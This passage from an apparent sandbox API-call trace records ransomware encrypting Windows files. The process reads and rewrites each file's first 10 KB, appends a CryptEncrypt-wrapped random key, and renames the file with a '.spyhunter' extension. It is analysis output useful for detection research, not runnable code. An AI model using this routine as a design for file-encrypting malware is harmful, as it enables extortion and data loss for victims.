dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0128.494] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\webapprt-stub.exe") returned 60 [0128.494] StrStrW (lpFirst="webapprt-stub.exe", lpSrch=".txt") returned 0x0 [0128.494] GetProcessHeap () returned 0x2c0000 [0128.494] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0128.494] ReadFile (in: hFile=0x17c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf6a4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf6a4*=0x2800, lpOverlapped=0x0) returned 1 [0128.764] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0128.764] WriteFile (in: hFile=0x17c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf6a4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf6a4*=0x2800, lpOverlapped=0x0) returned 1 [0128.764] GetProcessHeap () returned 0x2c0000 [0128.764] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0128.764] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0128.764] WriteFile (in: hFile=0x17c, lpBuffer=0x25cf6e4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf6a4, lpOverlapped=0x0 | out: lpBuffer=0x25cf6e4*, lpNumberOfBytesWritten=0x25cf6a4*=0x4, lpOverlapped=0x0) returned 1 [0128.783] WriteFile (in: hFile=0x17c, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf6a4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf6a4*=0x30, lpOverlapped=0x0) returned 1 [0128.783] CloseHandle (hObject=0x17c) returned 1 [0128.784] GetProcessHeap () returned 0x2c0000 [0128.784] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f28720 [0128.784] wnsprintfW (in: pszDest=0x2f28720, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\webapprt-stub.exe.spyhunter") returned 70 [0128.784] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\webapprt-stub.exe" (normalized: "c:\\program files (x86)\\mozilla firefox\\webapprt-stub.exe"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\webapprt-stub.exe.spyhunter" (normalized: "c:\\program files (x86)\\mozilla firefox\\webapprt-stub.exe.spyhunter")) returned 1 [0128.784] GetProcessHeap () returned 0x2c0000 [0128.784] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f28720 | out: hHeap=0x2c0000) returned 1 [0128.784] GetProcessHeap () returned 0x2c0000 [0128.785] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0128.785] GetProcessHeap () returned 0x2c0000 [0128.785] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec5df8 | out: hHeap=0x2c0000) returned 1 [0128.785] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf6e8 | out: pbBuffer=0x25cf6e8) returned 1 [0128.785] GetProcessHeap () returned 0x2c0000 [0128.785] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0128.785] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf6e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf6e0*=0x30) returned 1 [0128.785] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\WindowsFormsIntegration.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\windowsformsintegration.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0128.818] GetProcessHeap () returned 0x2c0000 [0128.819] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0128.819] GetProcessHeap () returned 0x2c0000 [0128.819] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec93c0 | out: hHeap=0x2c0000) returned 1 [0128.819] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf6e0 | out: pbBuffer=0x25cf6e0) returned 1 [0128.819] GetProcessHeap () returned 0x2c0000 [0128.819] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0128.819] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf6d8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf6d8*=0x30) returned 1 [0128.819] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\gadget.xml" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\en-us\\gadget.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0128.978] GetProcessHeap () returned 0x2c0000 [0128.978] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0129.034] GetProcessHeap () returned 0x2c0000 [0129.034] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c8a3a8 | out: hHeap=0x2c0000) returned 1 [0129.056] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf6d8 | out: pbBuffer=0x25cf6d8) returned 1 [0129.056] GetProcessHeap () returned 0x2c0000 [0129.056] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0129.056] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf6d0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf6d0*=0x30) returned 1 [0129.056] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Active.GRL" (normalized: "c:\\programdata\\microsoft\\mf\\active.grl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0129.056] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Active.GRL") returned 42 [0129.056] StrStrW (lpFirst="Active.GRL", lpSrch=".txt") returned 0x0 [0129.056] GetProcessHeap () returned 0x2c0000 [0129.056] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0129.056] ReadFile (in: hFile=0x17c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf694, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cf694*=0x2800, lpOverlapped=0x0) returned 1 [0129.109] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0129.109] WriteFile (in: hFile=0x17c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf694, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cf694*=0x2800, lpOverlapped=0x0) returned 1 [0129.109] GetProcessHeap () returned 0x2c0000 [0129.109] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0129.109] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.109] WriteFile (in: hFile=0x17c, lpBuffer=0x25cf6d4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf694, lpOverlapped=0x0 | out: lpBuffer=0x25cf6d4*, lpNumberOfBytesWritten=0x25cf694*=0x4, lpOverlapped=0x0) returned 1 [0129.210] WriteFile (in: hFile=0x17c, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf694, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf694*=0x30, lpOverlapped=0x0) returned 1 [0129.210] CloseHandle (hObject=0x17c) returned 1 [0129.210] GetProcessHeap () returned 0x2c0000 [0129.210] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ef5c20 [0129.210] wnsprintfW (in: pszDest=0x2ef5c20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Active.GRL.spyhunter") returned 52 [0129.210] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Active.GRL" (normalized: "c:\\programdata\\microsoft\\mf\\active.grl"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Active.GRL.spyhunter" (normalized: "c:\\programdata\\microsoft\\mf\\active.grl.spyhunter")) returned 1 [0129.211] GetProcessHeap () returned 0x2c0000 [0129.211] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef5c20 | out: hHeap=0x2c0000) returned 1 [0129.211] GetProcessHeap () returned 0x2c0000 [0129.211] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0129.211] GetProcessHeap () returned 0x2c0000 [0129.211] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d0a868 | out: hHeap=0x2c0000) returned 1 [0129.211] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf6d8 | out: pbBuffer=0x25cf6d8) returned 1 [0129.211] GetProcessHeap () returned 0x2c0000 [0129.211] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0129.211] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf6d0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf6d0*=0x30) returned 1 [0129.211] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\SharePointTeamSite.ico" (normalized: "c:\\programdata\\microsoft\\office\\sharepointteamsite.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0129.212] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\SharePointTeamSite.ico") returned 58 [0129.212] StrStrW (lpFirst="SharePointTeamSite.ico", lpSrch=".txt") returned 0x0 [0129.212] GetProcessHeap () returned 0x2c0000 [0129.212] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0129.212] ReadFile (in: hFile=0x17c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf694, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25cf694*=0x2800, lpOverlapped=0x0) returned 1 [0129.242] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0129.242] WriteFile (in: hFile=0x17c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf694, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25cf694*=0x2800, lpOverlapped=0x0) returned 1 [0129.242] GetProcessHeap () returned 0x2c0000 [0129.242] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0129.242] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.243] WriteFile (in: hFile=0x17c, lpBuffer=0x25cf6d4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf694, lpOverlapped=0x0 | out: lpBuffer=0x25cf6d4*, lpNumberOfBytesWritten=0x25cf694*=0x4, lpOverlapped=0x0) returned 1 [0129.248] WriteFile (in: hFile=0x17c, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf694, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf694*=0x30, lpOverlapped=0x0) returned 1 [0129.248] CloseHandle (hObject=0x17c) returned 1 [0129.248] GetProcessHeap () returned 0x2c0000 [0129.248] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ef5c20 [0129.249] wnsprintfW (in: pszDest=0x2ef5c20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\SharePointTeamSite.ico.spyhunter") returned 68 [0129.249] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\SharePointTeamSite.ico" (normalized: "c:\\programdata\\microsoft\\office\\sharepointteamsite.ico"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\SharePointTeamSite.ico.spyhunter" (normalized: "c:\\programdata\\microsoft\\office\\sharepointteamsite.ico.spyhunter")) returned 1 [0129.249] GetProcessHeap () returned 0x2c0000 [0129.249] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef5c20 | out: hHeap=0x2c0000) returned 1 [0129.249] GetProcessHeap () returned 0x2c0000 [0129.249] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0129.249] GetProcessHeap () returned 0x2c0000 [0129.249] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea98f8 | out: hHeap=0x2c0000) returned 1 [0129.249] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf6d0 | out: pbBuffer=0x25cf6d0) returned 1 [0129.249] GetProcessHeap () returned 0x2c0000 [0129.249] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0129.250] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf6c8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf6c8*=0x30) returned 1 [0129.250] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\MySharePoints.ico" (normalized: "c:\\programdata\\microsoft\\office\\mysharepoints.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0129.289] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\MySharePoints.ico") returned 53 [0129.289] StrStrW (lpFirst="MySharePoints.ico", lpSrch=".txt") returned 0x0 [0129.289] GetProcessHeap () returned 0x2c0000 [0129.289] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0129.289] ReadFile (in: hFile=0x17c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf68c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf68c*=0x2800, lpOverlapped=0x0) returned 1 [0129.291] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0129.291] WriteFile (in: hFile=0x17c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf68c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf68c*=0x2800, lpOverlapped=0x0) returned 1 [0129.291] GetProcessHeap () returned 0x2c0000 [0129.291] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0129.291] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.291] WriteFile (in: hFile=0x17c, lpBuffer=0x25cf6cc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf68c, lpOverlapped=0x0 | out: lpBuffer=0x25cf6cc*, lpNumberOfBytesWritten=0x25cf68c*=0x4, lpOverlapped=0x0) returned 1 [0129.312] WriteFile (in: hFile=0x17c, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf68c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf68c*=0x30, lpOverlapped=0x0) returned 1 [0129.312] CloseHandle (hObject=0x17c) returned 1 [0129.312] GetProcessHeap () returned 0x2c0000 [0129.312] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ef5c20 [0129.312] wnsprintfW (in: pszDest=0x2ef5c20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\MySharePoints.ico.spyhunter") returned 63 [0129.312] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\MySharePoints.ico" (normalized: "c:\\programdata\\microsoft\\office\\mysharepoints.ico"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\MySharePoints.ico.spyhunter" (normalized: "c:\\programdata\\microsoft\\office\\mysharepoints.ico.spyhunter")) returned 1 [0129.313] GetProcessHeap () returned 0x2c0000 [0129.313] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef5c20 | out: hHeap=0x2c0000) returned 1 [0129.313] GetProcessHeap () returned 0x2c0000 [0129.313] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0129.313] GetProcessHeap () returned 0x2c0000 [0129.313] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec1e30 | out: hHeap=0x2c0000) returned 1 [0129.313] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf6d0 | out: pbBuffer=0x25cf6d0) returned 1 [0129.313] GetProcessHeap () returned 0x2c0000 [0129.313] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0129.313] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf6c8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf6c8*=0x30) returned 1 [0129.313] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\XLINTL32.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\xlintl32.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf0 [0129.317] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\XLINTL32.REST.trx_dll") returned 73 [0129.317] StrStrW (lpFirst="XLINTL32.REST.trx_dll", lpSrch=".txt") returned 0x0 [0129.317] GetProcessHeap () returned 0x2c0000 [0129.317] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0129.317] ReadFile (in: hFile=0xf0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf68c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25cf68c*=0x2800, lpOverlapped=0x0) returned 1 [0129.333] SetFilePointerEx (in: hFile=0xf0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0129.333] WriteFile (in: hFile=0xf0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf68c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25cf68c*=0x2800, lpOverlapped=0x0) returned 1 [0129.333] GetProcessHeap () returned 0x2c0000 [0129.333] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0129.333] SetFilePointerEx (in: hFile=0xf0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.333] WriteFile (in: hFile=0xf0, lpBuffer=0x25cf6cc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf68c, lpOverlapped=0x0 | out: lpBuffer=0x25cf6cc*, lpNumberOfBytesWritten=0x25cf68c*=0x4, lpOverlapped=0x0) returned 1 [0129.341] WriteFile (in: hFile=0xf0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf68c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf68c*=0x30, lpOverlapped=0x0) returned 1 [0129.342] CloseHandle (hObject=0xf0) returned 1 [0129.386] GetProcessHeap () returned 0x2c0000 [0129.386] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ef5c20 [0129.386] wnsprintfW (in: pszDest=0x2ef5c20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\XLINTL32.REST.trx_dll.spyhunter") returned 83 [0129.386] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\XLINTL32.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\xlintl32.rest.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\XLINTL32.REST.trx_dll.spyhunter" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\xlintl32.rest.trx_dll.spyhunter")) returned 1 [0129.387] GetProcessHeap () returned 0x2c0000 [0129.387] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef5c20 | out: hHeap=0x2c0000) returned 1 [0129.387] GetProcessHeap () returned 0x2c0000 [0129.387] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0129.387] GetProcessHeap () returned 0x2c0000 [0129.387] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb3dd8 | out: hHeap=0x2c0000) returned 1 [0129.628] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf6b8 | out: pbBuffer=0x25cf6b8) returned 1 [0129.628] GetProcessHeap () returned 0x2c0000 [0129.628] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0129.628] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x25cf6b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x25cf6b0*=0x30) returned 1 [0129.628] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\Profiles\\.." (normalized: "c:\\programdata\\microsoft\\wwansvc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0129.628] GetProcessHeap () returned 0x2c0000 [0129.628] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0129.629] GetProcessHeap () returned 0x2c0000 [0129.629] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebf430 | out: hHeap=0x2c0000) returned 1 [0129.629] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf6b0 | out: pbBuffer=0x25cf6b0) returned 1 [0129.629] GetProcessHeap () returned 0x2c0000 [0129.629] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0129.629] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x25cf6a8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x25cf6a8*=0x30) returned 1 [0129.629] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\Profiles\\." (normalized: "c:\\programdata\\microsoft\\wwansvc\\profiles\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0129.629] GetProcessHeap () returned 0x2c0000 [0129.629] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0129.629] GetProcessHeap () returned 0x2c0000 [0129.629] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33df18 | out: hHeap=0x2c0000) returned 1 [0129.629] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf6b0 | out: pbBuffer=0x25cf6b0) returned 1 [0129.629] GetProcessHeap () returned 0x2c0000 [0129.629] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0129.629] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x25cf6a8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x25cf6a8*=0x30) returned 1 [0129.630] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\.." (normalized: "c:\\programdata\\microsoft"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0129.630] GetProcessHeap () returned 0x2c0000 [0129.630] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0129.630] GetProcessHeap () returned 0x2c0000 [0129.630] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30bee8 | out: hHeap=0x2c0000) returned 1 [0129.630] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf6a8 | out: pbBuffer=0x25cf6a8) returned 1 [0129.630] GetProcessHeap () returned 0x2c0000 [0129.630] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0129.630] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x25cf6a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x25cf6a0*=0x30) returned 1 [0129.630] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\." (normalized: "c:\\programdata\\microsoft\\wwansvc\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0129.630] 